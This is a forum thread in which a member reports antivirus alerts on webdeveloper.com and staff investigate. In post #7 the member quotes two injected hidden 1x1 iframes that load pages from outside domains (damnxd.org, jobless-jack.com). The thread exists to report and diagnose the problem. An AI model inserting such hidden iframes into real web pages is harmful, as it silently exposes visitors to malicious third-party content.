www.webdeveloper.com
Results 1 to 10 of 10

Thread: ~ there is something nasty on this site ~

  1. #1
    Join Date
    Jan 2004
    Location
    chertsey, a small town s.w. of london, england.
    Posts
    1,463

    ~ there is something nasty on this site ~

    Hi there staff,

    there is something nasty on this site that has arrived recently, or
    has only just been added to ESET Nod32 antivirus 7's blacklist.

    I have attached an image of the notification that pops up at very
    regular intervals, by regular I mean about every fifteen seconds.

    Should you or I be concerned about it?

    coothead
    Attached Images Attached Images

  2. #2
    Join Date
    Nov 2011
    Location
    Dallas, TX
    Posts
    338
    Thanks.

    Reported.

  3. #3
    Join Date
    Feb 2005
    Location
    Indianapolis, IN
    Posts
    155
    Did you email us about this as well?

    Is anyone else seeing warnings? We are reviewing.

    Brad!

  4. #4
    Join Date
    Jan 2004
    Location
    chertsey, a small town s.w. of london, england.
    Posts
    1,463
    Hi there Brad,

    No, I did not send an email, I just posted the problem here on the forum.

    It does seem that adnxs.com may be an unwelcome intruder.

    coothead

  5. #5
    Join Date
    Jan 2004
    Location
    chertsey, a small town s.w. of london, england.
    Posts
    1,463
    Hi there Brad,

    I forgot to mention, because my attention was drawn to the antivirus notification, that the page
    reconnects to an address, that I am unable to read as it happens so quickly, every fifteen seconds.

    Could this be a "Google" adv problem?

    coothead

  6. #6
    Join Date
    Feb 2005
    Location
    Indianapolis, IN
    Posts
    155
    It very well could be a problem with an ad. We'll look into it.

    Brad!

  7. #7
    Join Date
    Jan 2004
    Location
    chertsey, a small town s.w. of london, england.
    Posts
    1,463
    Hi there Brad,

    I have tracked down the cause or the "reconnecting" problem.

    It is these two little buggers near the bottom of the page...
    Code:
    
    <iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe>
    <iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe>
    ...working in conjunction.

    These sites...
    1. http://damnxd.org/
    2. http://www.jobless-jack.com/

    ...obviously, do not have this forums interests at heart.

    coothead

  8. #8
    Join Date
    Nov 2011
    Location
    Dallas, TX
    Posts
    338
    Thanks Coot...

  9. #9
    Join Date
    Feb 2005
    Location
    Indianapolis, IN
    Posts
    155
    I've looked closer. Something is definitely amiss. We are digging deeper.

  10. #10
    Join Date
    Jan 2004
    Location
    chertsey, a small town s.w. of london, england.
    Posts
    1,463
    Hi there Brad,

    the site now appears to be stable again.

    I should point out, though it is probably not of the greatest
    importance, that the site's pages fail validation...


    One error of minor interest being the inclusion of two DOCTYPES.

    coothead

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles